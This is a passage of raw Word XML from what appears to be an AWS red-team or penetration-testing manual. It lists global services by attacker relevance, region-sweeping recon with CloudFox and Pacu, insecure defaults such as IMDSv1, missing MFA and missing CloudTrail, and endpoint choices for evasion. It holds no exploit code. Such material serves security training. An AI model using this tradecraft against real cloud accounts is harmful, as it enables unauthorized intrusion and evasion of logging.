              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17240A05"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Global AWS services and their attack implications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="14D1B689" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECEAE3"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E47070D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECEAE3"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75E65935" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECEAE3"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20F93E24" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attacker relevance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="280F18B5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C5455E0"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IAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A6F3D60"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iam.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78928541"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All IAM users, roles, policies. One policy change, account-wide effect.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="2C70DB3D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6633A899"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STS (legacy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66D7F568"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sts.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05EE9258"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Default endpoint globally; consider the regional endpoint when evading.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="24A2A391" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00977F84"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Organizations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F03A1F3"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organizations.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5968CD8E"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SCPs, account creation/close, master-account-only primitives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="59FCDFB4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E69C97F"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Route53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B63BC1F"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route53.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C34A078"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DNS zones, health checks. Global namespace; zone-walking is sensitive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="29C45E50" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="551EDA80"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CloudFront</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BB13FBD"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cloudfront.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79E6E3F6"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CDN distributions; origin tampering, tag pivots into backends.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="23DDC611" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D62E5F9"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S3 (bucket namespace)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="061D632B"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regional endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="307216B4"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Bucket names are global; account ID leakage in ACL responses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="18DD82E3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E044961"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IAM Identity Center</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="557FC17D"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sso.amazonaws.com (home region)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="212EBB8B"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Home region is fixed; permission sets apply org-wide.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04F30B9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Regional sweeps require you to enumerate every opted-in region. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws ec2 describe-regions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns the active list for the calling identity — an account that has disabled regions will not list them. Always make a dedicated recon pass that iterates over the canonical region list rather than assuming </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>us-east-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the only one in use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0F8FFD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="866331296"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OPERATOR NOTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F13E6B5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="866331296"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">The single biggest tradecraft error a new AWS operator makes is forgetting that services are regional. You run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws ec2 describe-instances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, see nothing, and conclude the account has no compute — when in fact the real fleet is in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>us-west-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>eu-west-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ap-southeast-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. CloudFox's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>all-checks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Pacu's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2__enum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> both iterate regions automatically; use them instead of hand-rolling a single-region call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598662BA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>2.5  Default configurations that bite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386638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Every service ships with a default posture, and many of those defaults have quietly changed over the years as AWS tightened security. Knowing the current default — and more importantly, knowing when the customer's account was created — lets you predict whether a given attack is still viable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A4B903" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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IMDSv1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is still enabled on older AMIs; new EC2 launches since 2023 default to IMDSv2-only. Test both.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5A7DCF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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S3 Block Public Access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is on by default at the account level for accounts created after April 2023. Older accounts may still have the old default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19994040" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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EBS encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is on by default per-region since 2020, but many long-lived accounts have opted out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274286C2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Default VPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> still exists in every region of every account and still has an open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>0.0.0.0/0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Group named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> in most customers' environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E387A19" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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IAM root-user MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not enforced by default. A significant fraction of production accounts still have a root user with a password-only login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B0DEB6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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CloudTrail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not on by default in every region — only a single-region </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Event History</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which is not a trail and expires after 90 days). Many smaller accounts have no persistent trail at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775CA67C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386BCFFE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Five entry classes cover virtually every AWS compromise: leaked creds, exposed services, SSRF/IMDS, supply chain, federation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B172150" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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STS is the credential authority; every foothold you build issues an STS session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6165ABF7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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IAM Identity Center is the modern federated default and changes where the stolen-token artifact lives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1482FB86" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Most services are regional; sweep every region, not just </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>us-east-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF80085" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Defaults change over time. Date the account to predict which defaults apply.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6838DB09" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="47077598"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Foundations</w:t>
